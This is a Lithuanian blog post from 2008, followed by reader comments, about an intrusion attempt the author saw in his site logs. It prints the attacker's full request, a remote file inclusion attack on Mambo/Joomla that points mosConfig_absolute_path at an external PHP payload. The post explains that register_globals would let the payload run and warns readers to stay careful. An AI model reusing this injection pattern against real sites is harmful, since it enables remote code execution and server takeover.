Šį blogą bando nulaužti
Kartas nuo karto nueinu pasižiūrėti, kas šiuo metu naršo mano bloge. Pasižiūriu iš kur atėjo, kokį puslapį žiūri. Įdomu, kai viskas vyksta „on the fly“.
Dabar ką tik prisijungęs pamačiau, kad žmogus/robotas iš šio IP 72.55.143.52 bando laužtis į šį puslapį. Grečiausiai tai daro koks nors script kiddie, nes įvedus šį IP į google, paieškos rezultatuose išmetami access logai su panašiomis atakomis.
Kaip vykdoma ataka.
Į nuorodą yra įvedama štai tokia eilutė
http://www.sadauskas.lt/index.php/category/kompiuterija/programavimas/php/
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&
_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
http://www.pooya.info/images/…/test.txt%3
Iš kintamųjų bandomų perduoti per užklausą spėju, kad bandoma įsibrauti panaudojant kažkokį Mambo/Joomla TVS’o pažeidžiamumą arba tiesiog išnaudoti register_globals on parametrą, jeigu serverio administratorius nekoks specialistas ir palieką jį įjungtą.
Jeigu aš naudočiau Joomla TVS ir serverio parametruose būtų register globals on, tai puslapis įvykdytų PHP kodą, kuris pateiktas šioje nuorodoje http://www.pooya.info/images/…/test.txt
Na, o jeigu jau puslapis jį įvykdytų ir serveris būtų netvarkingai sukonfigūruotas, tai viso gero jūsų duomenims, o gal ir visam serveriui.
Tokių kiber atakų turbūt patiriame kiekvienas, tik dažniausiai jų nepastebime. Būkit atsargūs.

January 29th, 2008 at 18:03
kiekvieną svetainę eina tiek x užklausų
January 29th, 2008 at 18:10
Kiekvienas “dirba” savo darbą.
January 29th, 2008 at 20:41
[...] ar kažkokie arabai nelenda į jūsų svetainę md5 kodo tikrinti. Žilvinas rašo, kad bandomas nulaužti ir jo tinklaraštis - ieškant TVS saugumo spragų. Brukalai komentaruose plūste užplūdo Gostik tinklaraštį (vaistai - Akismet, Raven’s [...]
January 30th, 2008 at 00:25
wou, whats the point of doing this… nesuprantu
January 30th, 2008 at 15:32
Aš irgi jau daug kartų gavęs šitą.
January 30th, 2008 at 19:35
O mano senaji tvs’a neseniai kazkas nulauze. Juokiasi tas, kas paskutinis pasidare back up’a.
February 4th, 2008 at 07:45
kam lauztis i kazkoki bloga??
nebent tam kad ideti pr0n reklama
apie V1agra.
February 5th, 2008 at 23:36
Cia matyt Zilvinas papiktino asmenis kazkaip susijusius su Dizaino Kryptimi del to straipsniuko anksciau
Rengiamas samokslas 